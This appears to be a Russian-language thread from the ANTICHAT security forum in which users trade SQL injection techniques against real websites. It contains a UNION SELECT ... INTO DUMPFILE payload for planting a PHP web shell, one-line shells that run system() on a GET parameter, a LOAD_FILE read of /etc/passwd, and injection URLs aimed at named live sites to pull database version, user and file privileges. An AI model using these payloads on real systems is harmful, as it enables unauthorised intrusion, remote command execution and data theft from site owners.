ANTICHAT — форум по информационной безопасности, OSINT и технологиям

для начала, узнать алгоритм шифрования

ребят, хочу залить шелл посредством SQL, а именно:

union+select+1,'<?php код вашего шелла ?>',3,4,5,6,7,8+into+DUMPFILE+'/путь/до/вашего/будующего/шелла/shell.php'/*

php код вашего шелла - сюда не вариант ведь пихать весь код, например, шелла от madnet'a.
Посоветуйте, какой "мини" шелл или команду выполнить там, чтобы потом можно было залить полноценный шелл?

<?
echo "<pre>";
system($_GET["id"]);
echo "</pre>";
?>

вот и весь шелл)))

<? system($_GET[cmd]); ?>

нашел sql уязвимость

выдает ошибку
после SELECT * FROM mobiticket.structure_page WHERE tag = '595'' идет AND

до AND сработает union? /* не обрыв строки? спасибо!

http://themood.ru/index.php?pr=15'
Полскажите пожалуйста есть ли тут инъекция?все уже перепробывал.Если нет то почему ошибка выскакивает?спасибо!

http://themood.ru/index.php?pr=1500+union+select+1,2,3,concat(versio n(),0x3a,user(),0x3a,database()),5,6

Это скорее всего результат действия AES_ENCRYPT() или аналогов. Без доступа к сорсу точно не узнать (хотя можно попробовать посмотреть на свой пасс в надежде, что криптуется каким-нибудь маленьким постоянным словом).

PS А ну и естественно выводить через ascii()

проверяю на запись и пытаюсь записать так:
union+select+file_priv+from+mysql.user+where+user= 'имя юзера'
union+select+LOAD_FILE('/etc/passwd')+from+mysql.user

если на сайте таблика, где хранятся логин;пароль называется не user, то подставляю в запрос то которое на сайте? А если там нет данных о "текущем" юзвери, что делать?


например как быть тут
http://www.stmaryslutterworth.org/pages/main.php?id=-32+union+select+file_priv,2,3,4+from+mysql.user+wh ere+user='stmary_stmary'--

тут ведь нет таблицы user